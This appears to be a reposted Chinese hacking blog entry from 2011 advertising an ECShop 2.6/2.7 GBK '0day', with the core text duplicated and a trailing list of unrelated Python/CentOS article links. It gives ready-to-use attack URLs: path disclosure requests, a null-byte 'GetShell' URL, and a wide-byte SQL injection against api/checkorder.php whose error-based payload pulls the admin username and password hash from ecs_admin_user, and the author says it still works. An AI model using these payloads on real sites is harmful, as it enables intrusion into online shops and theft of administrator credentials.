ecshop 通杀2.6*2.7 GBK版本 oday 爆路径 GetShell
2011-07-24 11:07
706 查看
据说该0day是fjhgx(俺是农村的)大牛发现的。。。
Exp等黑小子发吧。。。或者自己手动也行。。。
以前很早的东西了 刚测试还可以用 至于有一些能不能搞 自行测试 这些东西都可以想起以前的兄弟们 我对这些已经不敢兴趣了 有什么好东西我会陆续放出 工具我会打包!
ecshop 通杀2.6*2.7 GBK版本 附上测试图!
(射出编码 0x全部替换)
(替换后的编码)
(lcx的php注射工具 转换编码 From Hex 转换后得到MD5)
ecshop GetShell
http://localhost/ECShop/demo/index.php?a=1111111111%00
爆路径
http://localhost/ECShop/includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts/spellchecker.php
测试
http://localhost/api/checkorder.php?username=%CE%27 or 1=1 %23
=============
http://localhost/ecshop/api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
Exp等黑小子发吧。。。或者自己手动也行。。。
以前很早的东西了 刚测试还可以用 至于有一些能不能搞 自行测试 这些东西都可以想起以前的兄弟们 我对这些已经不敢兴趣了 有什么好东西我会陆续放出 工具我会打包!
ecshop 通杀2.6*2.7 GBK版本 附上测试图!
(射出编码 0x全部替换)
(替换后的编码)
(lcx的php注射工具 转换编码 From Hex 转换后得到MD5)
ecshop GetShell
http://localhost/ECShop/demo/index.php?a=1111111111%00
爆路径
http://localhost/ECShop/includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts/spellchecker.php
测试
http://localhost/api/checkorder.php?username=%CE%27 or 1=1 %23
=============
http://localhost/ecshop/api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Centos 升级Python到2.6或2.7版本
- Linux更新python版本(2.6---2.7)
- 2.6 相对和绝对路径 2.7 cd命令 2.8 创建和删除目录mkdir/rmdir 2.9 rm
- ECSHOP 修改后台路径地址,查看版本
- 2.6 相对和绝对路径 2.7 cd命令 2.8 创建和删除目录mkdir/rmdir 2.9 rm命令
- 2.6 相对和绝对路径 2.7 cd命令 2.8 创建和删除目录mkdir/rmdir 2.9 rm命令
- 安装ecshop2.7时候的错误处理 php版本不兼容引起
- ECSHOP 版本2.7 商品详情页面,显示购买记录
- 二周第一次课(10月23日) 2.6 相对和绝对路径 2.7 cd命令 2.8 创建和删除目录mkdir/rmdir 2.9 rm命令
- LINUX 中2.6 python 2.7 版本升级 mark 备注
- 在centos6.5环境下搭建多版本python(python2.6、python2.7、python3.5)共存环境
- Centos升级python版本2.6至2.7
- centos系统python版本2.6升级到2.7
- 2.6 相对和绝对路径 2.7 cd命令 2.8 创建和删除目录mkdir/rmdir 2.9 rm
- 2.6 相对和绝对路径 2.7 cd命令 2.8 创建和删除目录mkdir/rmdir 2.9 rm
- mac python自带版本2.6与2.7 如何在Python Django 项目里使用新版Python3.x.x
- python2.6版本升级2.7
- 2.6 相对和绝对路径 2.7 cd命令 2.8 创建和删除目录2.9 rm命令
- Centos6.X系统默认的Python2.6版本和pip2.6,如何升级到python2.7和pip2.7
- CentOS python版本的升级 从2.6 到2.7